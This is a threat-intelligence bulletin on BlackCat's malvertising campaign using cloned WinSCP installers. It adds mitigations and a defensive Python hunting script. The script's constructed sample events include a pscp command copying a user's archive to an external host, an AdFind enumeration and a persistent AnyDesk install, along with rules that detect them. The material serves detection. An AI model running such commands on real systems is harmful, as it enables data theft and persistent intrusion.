BlackCat Uses Malvertising to Push Backdoor

Cyber Security Threat Summary:
“The BlackCat ransomware-as-a-service group is developing a threat activity cluster by deploying malicious malware using chosen keywords on webpages of legitimate organizations. They engage in unauthorized activities within company networks using cloned webpages of legitimate applications like WinSCP and SpyBoy. These cybercriminals hijack keywords to display malicious ads and lure unsuspecting users into downloading malware, a technique known as malvertising.

The attackers aim to steal top-level administrator privileges and establish persistence and backdoor access to the customer environment using remote management tools. The tactics employed in this campaign are similar to those used in previous campaigns by BlackCat, including the use of anti-antivirus or anti-endpoint detection and response tools like SpyBoy to evade detection.

To exfiltrate data, the attackers utilize the PuTTY Secure Copy client for transferring information. Further investigation of the command-and-control domains used by the threat actor reveals a possible relation with Clop ransomware.

The attack chain involves tricking unsuspecting users into downloading a cloned application containing malware through SEO-poisoning techniques. The initial loader is delivered, followed by the fetching of the bot core, and ultimately dropping the payload, typically a backdoor. In this specific case, the WinSCP application contained a backdoor with Cobalt Strike Beacon, which enables remote server operations.” (BankInfoSecurity, 2023).

Security Officer Comments:

The researchers also identified other tools employed by the threat actors. AdFind, a command-line Active Directory query tool, is used to enumerate users, groups, computers, organizational units and domain trusts over LDAP. In an intrusion that output maps the environment and picks targets for lateral movement and privilege escalation; AdFind itself only reads the directory and does not extract password hashes, so its value to the attacker is reconnaissance rather than credential theft. The actors also deployed the AnyDesk remote management tool to maintain persistent access to the compromised environment, a choice that blends in because the binary is legitimately signed and commonly present in enterprise networks.

Suggested Correction(s):
This campaign does not compromise the victim's own website; it poisons search results and sponsored ad placements so that a user searching for WinSCP or a similar tool lands on a cloned download page. Mitigations therefore belong on the endpoint and at the network edge rather than in the organization's web stack. Give staff a sanctioned source for common administrative tools (an internal software catalogue or package repository) so there is no reason to search for an installer, and use application control to block execution of unsigned or unexpectedly signed installers from user-writable locations such as Downloads and Temp. A WinSCP or PuTTY installer that is unsigned, or signed by a publisher other than the vendor, should not run. Treat ad networks and lookalike domains as a delivery channel: an ad blocker or DNS/web filtering that blocks sponsored results and newly registered lookalike domains removes most of the lure, and reporting the malicious ads and domains to the search engine, ad network and registrar shortens their lifetime.

Detection should key on the post-compromise tooling named in this report: AdFind executed by accounts that are not domain administrators, AnyDesk installed by a parent process that is not the organization's deployment agent, and pscp.exe or scp transfers to hosts outside the organization's address space. Because BlackCat's end goal is encryption and extortion, keep offline backups with tested restores and a rehearsed ransomware response plan. Security awareness training should be specific to this lure: the first or sponsored result is not necessarily the vendor's site, and installers are obtained by typing the vendor URL or using the internal catalogue, never from a search result.
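As an added example (not from the BankInfoSecurity article or the officer's commentary), the detection points above expressed as hunting rules in Python and run over a handful of constructed Sysmon-style process-creation events. The Authenticode signer names, the administrator allowlist, the internal address ranges and DNS suffix, and the list of parents from which an AnyDesk install is expected are assumptions for the example and must be tuned to your own environment; the sample events are invented for the demonstration.

```python
"""Hunting rules for the tradecraft described above: cloned-installer delivery,
AdFind discovery, PSCP exfiltration and AnyDesk persistence. Added example run
over constructed Sysmon-style process-creation events; not the article's code."""
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Assumed signer names; verify against a known-good copy of each vendor binary.
EXPECTED_SIGNERS = {"winscp": "Martin Prikryl", "pscp": "Simon Tatham",
                    "anydesk": "philandro Software GmbH"}
# Assumed: only these accounts may run AD query tools and deploy remote-management software.
ADMIN_ACCOUNTS = {"CORP\\svc_deploy"}
# Assumed internal address space and DNS suffix.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_SUFFIX = ".corp.example"
# Assumed parents from which an AnyDesk install is legitimate (deployment agent, interactive shell).
SANCTIONED_PARENTS = {"explorer.exe", "ccmexec.exe"}

SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"host": "ws01", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\Downloads\\WinSCP-6.1-Setup.exe",
     "parent": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "cmdline": "WinSCP-6.1-Setup.exe", "signer": "Unsigned"},
    {"host": "ws01", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\AdFind.exe",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "AdFind.exe -f objectcategory=person -csv", "signer": "Unsigned"},
    {"host": "ws01", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\pscp.exe",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "pscp.exe -pw x C:\\Users\\jdoe\\Documents\\export.zip user@203.0.113.10:/tmp/",
     "signer": "Simon Tatham"},
    {"host": "ws01", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\AppData\\Roaming\\AnyDesk\\AnyDesk.exe",
     "parent": "C:\\Users\\jdoe\\Downloads\\WinSCP-6.1-Setup.exe",
     "cmdline": "AnyDesk.exe --install C:\\Users\\jdoe\\AppData\\Roaming\\AnyDesk --start-with-win",
     "signer": "philandro Software GmbH"},
    {"host": "ws02", "user": "CORP\\svc_deploy",
     "image": "C:\\Program Files (x86)\\WinSCP\\WinSCP.exe",
     "parent": "C:\\Windows\\explorer.exe", "cmdline": "WinSCP.exe", "signer": "Martin Prikryl"},
    {"host": "ws02", "user": "CORP\\svc_deploy",
     "image": "C:\\Tools\\pscp.exe", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "pscp.exe C:\\Tools\\config.txt svc@10.20.30.40:/etc/app/", "signer": "Simon Tatham"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_internal_host(host: str) -> bool:
    """IP inside the assumed internal ranges, or a name under the internal DNS suffix."""
    try:
        ip = ipaddress.ip_address(host)
        return any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        return host.lower().endswith(INTERNAL_SUFFIX)


def scp_destination_host(cmdline: str) -> Optional[str]:
    """Remote host from a pscp/scp command line ([user@]host:path), skipping
    option flags and local Windows drive paths such as C:\\..."""
    for tok in cmdline.split():
        if tok.startswith("-") or re.match(r"^[A-Za-z]:[\\/]", tok):
            continue
        if ":" in tok:
            return tok.split(":", 1)[0].rsplit("@", 1)[-1]
    return None


def evaluate(ev: dict) -> List[str]:
    """Apply the four stage rules to one event; each hit is prefixed with its stage name."""
    image, parent = basename(ev["image"]), basename(ev["parent"])
    user, cmd, signer = ev["user"], ev["cmdline"], ev.get("signer", "Unsigned")
    hits = []
    # 1. Delivery: a binary named like one of the cloned tools but not signed by the vendor.
    for tool, expected in EXPECTED_SIGNERS.items():
        if tool in image and signer != expected:
            hits.append(f"delivery: {image} signed by '{signer}', expected '{expected}'")
    # 2. Discovery: AdFind run by an account outside the admin allowlist.
    if image.startswith("adfind") and user not in ADMIN_ACCOUNTS:
        hits.append(f"discovery: AdFind run by {user}: {cmd}")
    # 3. Exfiltration: PSCP/scp to a host outside the internal address space.
    if image in ("pscp.exe", "scp.exe"):
        host = scp_destination_host(cmd)
        if host and not is_internal_host(host):
            hits.append(f"exfiltration: {image} to external host {host}")
    # 4. Persistence: AnyDesk installed by a parent that is not a sanctioned deployer.
    if "anydesk" in image and "--install" in cmd and parent not in SANCTIONED_PARENTS:
        hits.append(f"persistence: AnyDesk install spawned by {parent}")
    return hits


def hunt(events) -> Dict[str, List[str]]:
    by_host = defaultdict(list)
    for ev in events:
        for hit in evaluate(ev):
            by_host[ev["host"]].append(hit)
    return dict(by_host)


def hosts_with_chain(events, min_stages: int = 2) -> List[str]:
    """Hosts where at least min_stages distinct stages fired: the chain, not one noisy rule."""
    return sorted(host for host, hits in hunt(events).items()
                  if len({h.split(":", 1)[0] for h in hits}) >= min_stages)


if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_EVENTS).items():
        print(host, *hits, sep="\n  ")
    print("chain on:", hosts_with_chain(SAMPLE_EVENTS))
```

Requiring two distinct stages on one host before escalating keeps a lone signer mismatch (a legitimately repackaged installer) or an administrator's pscp run from paging anyone, while the full sequence seen in this report (unsigned installer, AdFind, PSCP to an external host, AnyDesk installed by the installer) stands out on ws01.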

Link(s):
https://www.bankinfosecurity.com/blackcat-uses-malvertising-to-push-backdoor-a-22433